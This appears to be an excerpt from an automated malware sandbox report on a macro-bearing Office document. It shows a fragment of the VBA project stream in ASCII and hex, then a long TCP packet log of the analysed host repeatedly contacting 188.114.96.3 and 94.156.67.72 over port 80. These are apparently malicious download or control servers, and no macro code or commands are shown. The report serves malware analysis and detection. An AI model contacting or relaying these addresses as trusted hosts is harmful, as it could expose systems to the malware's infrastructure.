Data ASCII:	. % . . . . . . . . 0 * . . . . p . . H . . . . d . . . . . . . V B A P r o j e c t . . 4 . . @ . . j . . . = . . . . r . . . . . . . . . ^ h . . . . J < . . . . . r s t d o l e > . . . s . t . d . o . l . e . . . h . % . ^ . . * \\ G { 0 0 0 2 0 4 3 0 - . . . . . C . . . . . . 0 0 4 . 6 } # 2 . 0 # 0 . # C : \\ W i n d . o w s \\ S y s W O W 6 4 \\ . e 2 . . t l b # O L E . A u t o m a t i . o n . ` . . E O f f D i c E O . f . i . c E . . E . 2 D F 8 D 0 4 C . - 5 B F A - 1 0 1 B - B D E 5 E A A C 4 . 2 E
Data Raw:	01 25 b2 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 0a 00 1c 00 56 42 41 50 72 6f 6a 65 88 63 74 05 00 34 00 00 40 02 14 6a 06 02 0a 3d 02 0a 07 02 72 01 14 08 05 06 12 09 02 12 bf 8e 5e 68 08 94 00 0c 02 4a 3c 02 0a 16 00 01 72 80 73 74 64 6f 6c 65 3e 02 19 00 73 00 74 00 64 00 6f 00 80 6c 00 65 00 0d 00 68 00 25 02 5e 00 03 2a 5c 47

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 23, 2024 20:20:51.836338997 CEST	49161	80	192.168.2.22	188.114.96.3
May 23, 2024 20:20:51.851815939 CEST	80	49161	188.114.96.3	192.168.2.22
May 23, 2024 20:20:51.851923943 CEST	49161	80	192.168.2.22	188.114.96.3
May 23, 2024 20:20:51.852160931 CEST	49161	80	192.168.2.22	188.114.96.3
May 23, 2024 20:20:51.867361069 CEST	80	49161	188.114.96.3	192.168.2.22
May 23, 2024 20:20:52.967098951 CEST	80	49161	188.114.96.3	192.168.2.22
May 23, 2024 20:20:52.967164993 CEST	49161	80	192.168.2.22	188.114.96.3
May 23, 2024 20:20:52.981614113 CEST	49162	80	192.168.2.22	94.156.67.72
May 23, 2024 20:20:52.989701986 CEST	80	49162	94.156.67.72	192.168.2.22
May 23, 2024 20:20:52.989758015 CEST	49162	80	192.168.2.22	94.156.67.72
May 23, 2024 20:20:52.989835024 CEST	49162	80	192.168.2.22	94.156.67.72
May 23, 2024 20:20:53.000576973 CEST	80	49162	94.156.67.72	192.168.2.22
May 23, 2024 20:20:53.629616976 CEST	80	49162	94.156.67.72	192.168.2.22
May 23, 2024 20:20:53.629635096 CEST	80	49162	94.156.67.72	192.168.2.22
May 23, 2024 20:20:53.629749060 CEST	49162	80	192.168.2.22	94.156.67.72
May 23, 2024 20:20:53.630474091 CEST	80	49162	94.156.67.72	192.168.2.22
May 23, 2024 20:20:53.630503893 CEST	80	49162	94.156.67.72	192.168.2.22
May 23, 2024 20:20:53.630515099 CEST	80	49162	94.156.67.72	192.168.2.22
May 23, 2024 20:20:53.630525112 CEST	49162	80	192.168.2.22	94.156.67.72
May 23, 2024 20:20:53.630551100 CEST	49162	80	192.168.2.22	94.156.67.72
May 23, 2024 20:20:53.630551100 CEST	49162	80	192.168.2.22	94.156.67.72
May 23, 2024 20:20:53.631341934 CEST	80	49162	94.156.67.72	192.168.2.22
May 23, 2024 20:20:53.631355047 CEST	80	49162	94.156.67.72	192.168.2.22
May 23, 2024 20:20:53.631386995 CEST	49162	80	192.168.2.22	94.156.67.72
May 23, 2024 20:20:53.632226944 CEST	80	49162	94.156.67.72	192.168.2.22
May 23, 2024 20:20:53.632241964 CEST	80	49162	94.156.67.72	192.168.2.22
May 23, 2024 20:20:53.632255077 CEST	80	49162	94.156.67.72	192.168.2.22
May 23, 2024 20:20:53.632272959 CEST	49162	80	192.168.2.22	94.156.67.72
May 23, 2024 20:20:53.632288933 CEST	49162	80	192.168.2.22	94.156.67.72
May 23, 2024 20:20:53.635812998 CEST	49162	80	192.168.2.22	94.156.67.72
May 23, 2024 20:20:53.639336109 CEST	80	49162	94.156.67.72	192.168.2.22
May 23, 2024 20:20:53.639405966 CEST	49162	80	192.168.2.22	94.156.67.72
May 23, 2024 20:20:53.639691114 CEST	80	49162	94.156.67.72	192.168.2.22
May 23, 2024 20:20:53.639731884 CEST	49162	80	192.168.2.22	94.156.67.72
May 23, 2024 20:20:53.640256882 CEST	80	49162	94.156.67.72	192.168.2.22
May 23, 2024 20:20:53.640275955 CEST	80	49162	94.156.67.72	192.168.2.22
May 23, 2024 20:20:53.640320063 CEST	49162	80	192.168.2.22	94.156.67.72
May 23, 2024 20:20:53.640320063 CEST	49162	80	192.168.2.22	94.156.67.72
May 23, 2024 20:20:53.717319012 CEST	80	49162	94.156.67.72	192.168.2.22
May 23, 2024 20:20:53.717417955 CEST	49162	80	192.168.2.22	94.156.67.72
May 23, 2024 20:20:53.717662096 CEST	80	49162	94.156.67.72	192.168.2.22
May 23, 2024 20:20:53.717706919 CEST	49162	80	192.168.2.22	94.156.67.72
May 23, 2024 20:20:53.717957020 CEST	80	49162	94.156.67.72	192.168.2.22
May 23, 2024 20:20:53.717997074 CEST	49162	80	192.168.2.22	94.156.67.72
May 23, 2024 20:20:53.718266964 CEST	80	49162	94.156.67.72	192.168.2.22
May 23, 2024 20:20:53.718311071 CEST	49162	80	192.168.2.22	94.156.67.72
May 23, 2024 20:20:53.720192909 CEST	80	49162	94.156.67.72	192.168.2.22
May 23, 2024 20:20:53.720244884 CEST	49162	80	192.168.2.22	94.156.67.72
May 23, 2024 20:20:53.720742941 CEST	80	49162	94.156.67.72	192.168.2.22
May 23, 2024 20:20:53.720762968 CEST	80	49162	94.156.67.72	192.168.2.22
May 23, 2024 20:20:53.720777988 CEST	80	49162	94.156.67.72	192.168.2.22
May 23, 2024 20:20:53.720787048 CEST	49162	80	192.168.2.22	94.156.67.72
May 23, 2024 20:20:53.720802069 CEST	49162	80	192.168.2.22	94.156.67.72
May 23, 2024 20:20:53.720817089 CEST	49162	80	192.168.2.22	94.156.67.72
May 23, 2024 20:20:53.721657991 CEST	80	49162	94.156.67.72	192.168.2.22
May 23, 2024 20:20:53.721678972 CEST	80	49162	94.156.67.72	192.168.2.22
May 23, 2024 20:20:53.721693993 CEST	80	49162	94.156.67.72	192.168.2.22
May 23, 2024 20:20:53.721699953 CEST	49162	80	192.168.2.22	94.156.67.72
May 23, 2024 20:20:53.721712112 CEST	49162	80	192.168.2.22	94.156.67.72
May 23, 2024 20:20:53.721712112 CEST	80	49162	94.156.67.72	192.168.2.22
May 23, 2024 20:20:53.721731901 CEST	49162	80	192.168.2.22	94.156.67.72
May 23, 2024 20:20:53.721745968 CEST	49162	80	192.168.2.22	94.156.67.72
May 23, 2024 20:20:53.722557068 CEST	80	49162	94.156.67.72	192.168.2.22
May 23, 2024 20:20:53.722573042 CEST	80	49162	94.156.67.72	192.168.2.22
May 23, 2024 20:20:53.722585917 CEST	80	49162	94.156.67.72	192.168.2.22
May 23, 2024 20:20:53.722606897 CEST	49162	80	192.168.2.22	94.156.67.72
May 23, 2024 20:20:53.722606897 CEST	49162	80	192.168.2.22	94.156.67.72
May 23, 2024 20:20:53.722615004 CEST	49162	80	192.168.2.22	94.156.67.72
May 23, 2024 20:20:53.723422050 CEST	80	49162	94.156.67.72	192.168.2.22
May 23, 2024 20:20:53.723438978 CEST	80	49162	94.156.67.72	192.168.2.22
May 23, 2024 20:20:53.723479033 CEST	49162	80	192.168.2.22	94.156.67.72
May 23, 2024 20:20:53.724020958 CEST	80	49162	94.156.67.72	192.168.2.22
May 23, 2024 20:20:53.724061012 CEST	49162	80	192.168.2.22	94.156.67.72
May 23, 2024 20:20:53.724061012 CEST	49162	80	192.168.2.22	94.156.67.72
May 23, 2024 20:20:53.725832939 CEST	80	49162	94.156.67.72	192.168.2.22
May 23, 2024 20:20:53.725892067 CEST	49162	80	192.168.2.22	94.156.67.72
May 23, 2024 20:20:54.264033079 CEST	49162	80	192.168.2.22	94.156.67.72
May 23, 2024 20:20:54.620430946 CEST	49163	80	192.168.2.22	188.114.96.3
May 23, 2024 20:20:54.628870964 CEST	80	49163	188.114.96.3	192.168.2.22
May 23, 2024 20:20:54.629008055 CEST	49163	80	192.168.2.22	188.114.96.3
May 23, 2024 20:20:54.629136086 CEST	49163	80	192.168.2.22	188.114.96.3
May 23, 2024 20:20:54.638050079 CEST	80	49163	188.114.96.3	192.168.2.22
May 23, 2024 20:20:55.165565014 CEST	80	49163	188.114.96.3	192.168.2.22
May 23, 2024 20:20:55.165683985 CEST	49163	80	192.168.2.22	188.114.96.3
May 23, 2024 20:20:55.166498899 CEST	49163	80	192.168.2.22	188.114.96.3
May 23, 2024 20:20:55.184688091 CEST	80	49163	188.114.96.3	192.168.2.22
May 23, 2024 20:20:55.184890032 CEST	49163	80	192.168.2.22	188.114.96.3
May 23, 2024 20:20:55.418498993 CEST	49164	80	192.168.2.22	188.114.96.3
May 23, 2024 20:20:55.455355883 CEST	80	49164	188.114.96.3	192.168.2.22
May 23, 2024 20:20:55.455528975 CEST	49164	80	192.168.2.22	188.114.96.3
May 23, 2024 20:20:55.478600979 CEST	49164	80	192.168.2.22	188.114.96.3
May 23, 2024 20:20:55.483793020 CEST	80	49164	188.114.96.3	192.168.2.22
May 23, 2024 20:20:55.995611906 CEST	80	49164	188.114.96.3	192.168.2.22
May 23, 2024 20:20:55.995752096 CEST	49164	80	192.168.2.22	188.114.96.3
May 23, 2024 20:20:56.004744053 CEST	49164	80	192.168.2.22	188.114.96.3
May 23, 2024 20:20:56.016412973 CEST	80	49164	188.114.96.3	192.168.2.22
May 23, 2024 20:20:56.152142048 CEST	80	49164	188.114.96.3	192.168.2.22
May 23, 2024 20:20:56.152303934 CEST	49164	80	192.168.2.22	188.114.96.3
May 23, 2024 20:20:56.325567007 CEST	49165	80	192.168.2.22	188.114.96.3
May 23, 2024 20:20:56.359009981 CEST	80	49165	188.114.96.3	192.168.2.22
May 23, 2024 20:20:56.359080076 CEST	49165	80	192.168.2.22	188.114.96.3
May 23, 2024 20:20:56.359205961 CEST	49165	80	192.168.2.22	188.114.96.3
May 23, 2024 20:20:56.365571022 CEST	80	49165	188.114.96.3	192.168.2.22
May 23, 2024 20:20:57.306442976 CEST	80	49165	188.114.96.3	192.168.2.22
May 23, 2024 20:20:57.310363054 CEST	49166	80	192.168.2.22	94.156.67.72
May 23, 2024 20:20:57.328830004 CEST	80	49166	94.156.67.72	192.168.2.22
May 23, 2024 20:20:57.328958035 CEST	49166	80	192.168.2.22	94.156.67.72
May 23, 2024 20:20:57.329024076 CEST	49166	80	192.168.2.22	94.156.67.72
May 23, 2024 20:20:57.387656927 CEST	80	49166	94.156.67.72	192.168.2.22
May 23, 2024 20:20:57.520875931 CEST	49165	80	192.168.2.22	188.114.96.3
May 23, 2024 20:20:57.982094049 CEST	80	49166	94.156.67.72	192.168.2.22
May 23, 2024 20:20:58.191706896 CEST	49166	80	192.168.2.22	94.156.67.72
May 23, 2024 20:20:58.200534105 CEST	80	49166	94.156.67.72	192.168.2.22
May 23, 2024 20:20:58.200650930 CEST	49166	80	192.168.2.22	94.156.67.72
May 23, 2024 20:20:58.936342001 CEST	80	49162	94.156.67.72	192.168.2.22
May 23, 2024 20:20:58.936455965 CEST	49162	80	192.168.2.22	94.156.67.72
May 23, 2024 20:20:58.940112114 CEST	80	49162	94.156.67.72	192.168.2.22
May 23, 2024 20:20:58.940160990 CEST	49162	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:01.127990007 CEST	49167	80	192.168.2.22	188.114.96.3
May 23, 2024 20:21:01.172122002 CEST	80	49167	188.114.96.3	192.168.2.22
May 23, 2024 20:21:01.172224998 CEST	49167	80	192.168.2.22	188.114.96.3
May 23, 2024 20:21:01.174150944 CEST	49167	80	192.168.2.22	188.114.96.3
May 23, 2024 20:21:01.225646019 CEST	80	49167	188.114.96.3	192.168.2.22
May 23, 2024 20:21:01.754220009 CEST	80	49167	188.114.96.3	192.168.2.22
May 23, 2024 20:21:01.754745960 CEST	49167	80	192.168.2.22	188.114.96.3
May 23, 2024 20:21:01.778192997 CEST	80	49167	188.114.96.3	192.168.2.22
May 23, 2024 20:21:01.778292894 CEST	49167	80	192.168.2.22	188.114.96.3
May 23, 2024 20:21:01.834717035 CEST	49164	80	192.168.2.22	188.114.96.3
May 23, 2024 20:21:01.844160080 CEST	80	49164	188.114.96.3	192.168.2.22
May 23, 2024 20:21:02.435961962 CEST	80	49164	188.114.96.3	192.168.2.22
May 23, 2024 20:21:02.436019897 CEST	49164	80	192.168.2.22	188.114.96.3
May 23, 2024 20:21:02.438921928 CEST	49168	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:02.449255943 CEST	80	49168	94.156.67.72	192.168.2.22
May 23, 2024 20:21:02.449320078 CEST	49168	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:02.449398041 CEST	49168	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:02.460434914 CEST	80	49168	94.156.67.72	192.168.2.22
May 23, 2024 20:21:02.975951910 CEST	80	49166	94.156.67.72	192.168.2.22
May 23, 2024 20:21:02.976089954 CEST	49166	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:02.976089954 CEST	49166	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:02.987721920 CEST	80	49166	94.156.67.72	192.168.2.22
May 23, 2024 20:21:03.089210987 CEST	80	49168	94.156.67.72	192.168.2.22
May 23, 2024 20:21:03.089449883 CEST	49168	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:04.497708082 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:04.511420965 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:04.511495113 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:04.512393951 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:04.530800104 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.206437111 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.206538916 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.206705093 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.206742048 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.206844091 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.206856012 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.206881046 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.206892014 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.207298040 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.207313061 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.207323074 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.207345963 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.207356930 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.207356930 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.207369089 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.207393885 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.207402945 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.208509922 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.208548069 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.211052895 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.220832109 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.220885038 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.221420050 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.221471071 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.226751089 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.226928949 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.305840969 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.305919886 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.306241035 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.306282997 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.306423903 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.306457996 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.307410955 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.307471991 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.307497978 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.307543039 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.308430910 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.308466911 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.308587074 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.308630943 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.309362888 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.309401035 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.310342073 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.310359955 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.310395956 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.310395956 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.310657978 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.310695887 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.311364889 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.311402082 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.311526060 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.311558962 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.312130928 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.312406063 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.312448025 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.312555075 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.312589884 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.312994003 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.313041925 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.313292027 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.313328028 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.314454079 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.314498901 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.314766884 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.314807892 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.315363884 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.315409899 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.320174932 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.320210934 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.320230007 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.320249081 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.352710962 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.352792978 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.388881922 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.388950109 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.388964891 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.388988018 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.390779972 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.390836954 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.390908957 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.390957117 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.391247988 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.391284943 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.391299963 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.391324997 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.391755104 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.391810894 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.391916990 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.391971111 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.392431974 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.392483950 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.392575979 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.392621994 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.393078089 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.393131018 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.393246889 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.393296957 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.393541098 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.393601894 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.393754005 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.393799067 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.394529104 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.394618034 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.394638062 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.394663095 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.395212889 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.395272970 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.395319939 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.395365953 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.395756960 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.395812035 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.395859003 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.395900011 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.396425009 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.396475077 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.397236109 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.397273064 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.397293091 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.397309065 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.397402048 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.397447109 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.397769928 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.397825003 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.397877932 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.397922993 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.398545027 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.398595095 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.398633003 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.398679972 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.399069071 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.399123907 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.399390936 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.399447918 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.399727106 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.399787903 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.399998903 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.400052071 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.400872946 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.400911093 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.400928974 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.400950909 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.402889967 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.402946949 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.484761000 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.484847069 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.490554094 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.490608931 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.496268988 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.496320009 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.505806923 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.505850077 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.505881071 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.505903959 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.510971069 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.511028051 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.511121988 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.511169910 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.524349928 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.524385929 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.524403095 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.524434090 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.529978037 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.530014038 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.530045986 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.530045986 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.530046940 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.530090094 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.538779020 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.538836956 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.538846016 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.538873911 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.546854019 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.546889067 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.546931982 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.546931982 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.555485010 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.555521965 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.555569887 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.556088924 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.563232899 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.563270092 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.563282013 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.563304901 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.563313007 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.563345909 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.571041107 CEST	80	49169	94.156.67.72	192.168.2.22
